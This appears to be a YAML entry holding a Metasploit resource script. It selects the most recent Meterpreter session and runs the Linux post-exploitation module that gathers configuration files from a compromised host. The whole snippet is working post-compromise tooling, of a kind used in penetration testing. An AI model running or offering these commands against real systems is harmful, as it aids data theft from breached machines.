metasploit_meterpreter_getconfigs: |
    use post/linux/gather/enum_configs
    <ruby>
        sleep 2
        self.active_module.datastore["SESSION"] = framework.sessions.keys.max
        puts "Use session " + self.active_module.datastore["SESSION"].to_s
    </ruby>
    run